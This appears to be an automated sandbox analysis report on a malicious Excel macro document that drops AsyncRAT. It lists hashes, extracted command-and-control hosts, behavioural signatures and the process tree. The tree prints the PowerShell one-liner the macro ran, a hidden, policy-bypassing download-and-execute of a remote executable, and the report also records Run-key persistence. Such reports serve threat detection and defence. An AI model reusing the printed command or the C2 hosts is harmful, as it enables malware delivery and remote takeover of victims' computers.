Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
16-03-2023 02:55
Behavioral task
behavioral1
Sample
ORDER-230316.xlsm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ORDER-230316.xlsm
Resource
win10v2004-20230220-en
General
-
Target
ORDER-230316.xlsm
-
Size
41KB
-
MD5
91b915d7c1079e51e241748a006da03c
-
SHA1
846a9d44011340ebc31439f316efc2d1e5b279a6
-
SHA256
7508dd55323850161d037626592fc56eb6be4cc917c68ba90f3c5866f5c2b59d
-
SHA512
e40c725e1ca805ea9613e6f8f77f1119337e5bda49b6f5cd1f3cd7aa9f4f4da2aa744ec86cc6c5d7f264173390148ba07cc7968c22d340aceea31df5d3bf54c2
-
SSDEEP
768:iATtXvQ04qta8v+nWE8hMBIJYfTH+niSplFFiKk/fsgvRag+neWM:VxvSqJv+xG1BjFFi3/Egvg/e9
Malware Config
Extracted
asyncrat
0.5.7B
LATEST
chongmei33.publicvm.com:2703
chongmei33.publicvm.com:49746
chongmei33.publicvm.com:6974
chonglee575.duckdns.org:2703
chonglee575.duckdns.org:49746
chonglee575.duckdns.org:6974
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
update.exe
-
install_folder
%AppData%
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 948 1336 powershell.exe EXCEL.EXE -
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2140-176-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 43 948 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp9CE1.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation tmp9CE1.exe -
Executes dropped EXE 3 IoCs
Processes:
tmp9CE1.exetmp9CE1.exetmp9CE1.exepid process 4400 tmp9CE1.exe 4664 tmp9CE1.exe 2140 tmp9CE1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
tmp9CE1.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\"" tmp9CE1.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tmp9CE1.exedescription pid process target process PID 4400 set thread context of 2140 4400 tmp9CE1.exe tmp9CE1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 4784 ipconfig.exe 620 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1336 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exetmp9CE1.exepid process 948 powershell.exe 948 powershell.exe 4400 tmp9CE1.exe 4400 tmp9CE1.exe 4400 tmp9CE1.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetmp9CE1.exetmp9CE1.exedescription pid process Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 4400 tmp9CE1.exe Token: SeDebugPrivilege 2140 tmp9CE1.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1336 EXCEL.EXE 1336 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE 1336 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
EXCEL.EXEpowershell.exetmp9CE1.execmd.execmd.exedescription pid process target process PID 1336 wrote to memory of 948 1336 EXCEL.EXE powershell.exe PID 1336 wrote to memory of 948 1336 EXCEL.EXE powershell.exe PID 948 wrote to memory of 4400 948 powershell.exe tmp9CE1.exe PID 948 wrote to memory of 4400 948 powershell.exe tmp9CE1.exe PID 948 wrote to memory of 4400 948 powershell.exe tmp9CE1.exe PID 4400 wrote to memory of 2420 4400 tmp9CE1.exe cmd.exe PID 4400 wrote to memory of 2420 4400 tmp9CE1.exe cmd.exe PID 4400 wrote to memory of 2420 4400 tmp9CE1.exe cmd.exe PID 2420 wrote to memory of 4784 2420 cmd.exe ipconfig.exe PID 2420 wrote to memory of 4784 2420 cmd.exe ipconfig.exe PID 2420 wrote to memory of 4784 2420 cmd.exe ipconfig.exe PID 4400 wrote to memory of 448 4400 tmp9CE1.exe cmd.exe PID 4400 wrote to memory of 448 4400 tmp9CE1.exe cmd.exe PID 4400 wrote to memory of 448 4400 tmp9CE1.exe cmd.exe PID 448 wrote to memory of 620 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 620 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 620 448 cmd.exe ipconfig.exe PID 4400 wrote to memory of 4664 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 4664 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 4664 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe PID 4400 wrote to memory of 2140 4400 tmp9CE1.exe tmp9CE1.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER-230316.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://2m-store.com/megaa-store.com/public/wp.exe" -OutFile $TempFile; Start-Process $TempFile;2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe"C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /release5⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew5⤵
- Gathers network information
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeC:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeC:\Users\Admin\AppData\Local\Temp\tmp9CE1.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp9CE1.exe.logFilesize
1KB
MD57e88081fcf716d85992bb3af3d9b6454
SHA12153780fbc71061b0102a7a7b665349e1013e250
SHA2565ffb4a3ea94a6a53c4f88e2191c6fec5fd8a7336e367aa113fe8c12631e0c4d2
SHA512ec606e14367ae221c04f213a61a6f797034495121198e4788e3afa4aa8db67bf59c5c5210a56afae5557158e8923b013b371b84c7d64303618c5b4c57a2224f7
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4yzm4mo.11b.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeFilesize
2.8MB
MD5604352a51c64f59c25a04991f42a4418
SHA129d4fafa442693ae60f92816aa7f55e3a215fd3c
SHA25643639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
SHA512e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeFilesize
2.8MB
MD5604352a51c64f59c25a04991f42a4418
SHA129d4fafa442693ae60f92816aa7f55e3a215fd3c
SHA25643639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
SHA512e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeFilesize
2.8MB
MD5604352a51c64f59c25a04991f42a4418
SHA129d4fafa442693ae60f92816aa7f55e3a215fd3c
SHA25643639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
SHA512e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeFilesize
2.8MB
MD5604352a51c64f59c25a04991f42a4418
SHA129d4fafa442693ae60f92816aa7f55e3a215fd3c
SHA25643639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
SHA512e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
-
C:\Users\Admin\AppData\Local\Temp\tmp9CE1.exeFilesize
2.8MB
MD5604352a51c64f59c25a04991f42a4418
SHA129d4fafa442693ae60f92816aa7f55e3a215fd3c
SHA25643639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff
SHA512e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c
-
memory/948-157-0x0000019977CE0000-0x0000019977CF0000-memory.dmpFilesize
64KB
-
memory/948-154-0x0000019977FC0000-0x0000019977FE2000-memory.dmpFilesize
136KB
-
memory/948-156-0x0000019977CE0000-0x0000019977CF0000-memory.dmpFilesize
64KB
-
memory/948-155-0x0000019977CE0000-0x0000019977CF0000-memory.dmpFilesize
64KB
-
memory/1336-136-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-133-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-139-0x00007FFD886C0000-0x00007FFD886D0000-memory.dmpFilesize
64KB
-
memory/1336-138-0x00007FFD886C0000-0x00007FFD886D0000-memory.dmpFilesize
64KB
-
memory/1336-213-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-135-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-212-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-137-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-211-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-210-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/1336-134-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmpFilesize
64KB
-
memory/2140-195-0x0000000006050000-0x00000000060EC000-memory.dmpFilesize
624KB
-
memory/2140-191-0x0000000003480000-0x0000000003490000-memory.dmpFilesize
64KB
-
memory/2140-180-0x0000000003480000-0x0000000003490000-memory.dmpFilesize
64KB
-
memory/2140-196-0x00000000066A0000-0x0000000006C44000-memory.dmpFilesize
5.6MB
-
memory/2140-197-0x0000000006160000-0x00000000061C6000-memory.dmpFilesize
408KB
-
memory/2140-176-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4400-172-0x0000000004E80000-0x0000000004E90000-memory.dmpFilesize
64KB
-
memory/4400-173-0x00000000050A0000-0x00000000050C2000-memory.dmpFilesize
136KB
-
memory/4400-171-0x00000000000C0000-0x0000000000392000-memory.dmpFilesize
2.8MB